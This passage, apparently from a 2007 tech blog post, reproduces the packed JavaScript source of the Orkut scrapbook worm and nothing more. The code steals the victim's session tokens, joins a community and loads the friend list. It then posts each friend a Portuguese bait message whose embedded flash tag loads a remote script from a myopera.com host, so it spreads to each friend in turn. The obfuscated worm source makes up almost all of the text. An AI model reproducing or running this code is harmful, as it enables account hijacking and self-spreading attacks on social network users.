    $('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
    L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
    7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
    8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
    5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
    7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
    7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
    t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
    3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
    3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
    7 V(){6(j==8.18("N").M){b};
    5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>[1j]25 "+i F()+"[/1j]<1k/><13 1o=\\"o://k.w.p/28.z\\" 2a=\\"Q/x-2c-2d\\" 2e=\\"2g\');
    r=8.1n(\'r\');r.1o=\'o://1p.2k.p/2n/1p/1s.1t\';8.D(\'1w\')[0].1f(r);19(\'\\" 1C=\\"1\\" 1E=\\"1\\"></13>";
    5 a="15.1I=1&H="+n(q)+"&I="+n(I)+"&K="+n(E)+"&1T="+8.18("N").O(j).P;5 3=B();
    3.R("q","o://k.w.p/2i.z",C);3.12("10-1e","Q/x-k-17-1b;");
    3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\'s\',j,d);V()}}};
    6(!v(\'s\')){5 d=i F;d.1d(d.1h()+11);W(\'s\',\'0\',d)};j=v(\'s\');T();
    ',62,150,'|||xml||var|if|function|document|domain|send|return|path|wDate||select|name|begin|new|index|
    www|dc|expires|encodeURIComponent|http|com|POST|script|wormdoorkut|div|end|getCookie|orkut||cookie|aspx
    |prefix|createXMLHttpRequest|true|getElementsByTagName|SIG|Date|loadFriends|POST_TOKEN|scrapText|null|
    signature|catch|length|selectedList|item|value|application|open|indexOf|cmm_join|secure|sendScrap|setCookie|
    readyState|onreadystatechange|try|Content|86400|setRequestHeader|embed|ActiveXObject|Action|else|form|
    getElementById|escape|status|urlencoded|200|setTime|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|
    createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|GMT|go|GET|Compose|width|innerHTML|height|option|
    setAttribute|id|submit|style|display|none|removeChild|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|
    history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|raw|LoL|Msxml2|type|Microsoft|shockwave|flash|
    wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera
    |XMLHttpRequest|substring|virusdoorkut|CGI|Page'.split('|'),0,{}),1
);
author="Rodrigo Lacerda"

techtalk | 30 comments | permalink | 19.12.2007 12:08 SGT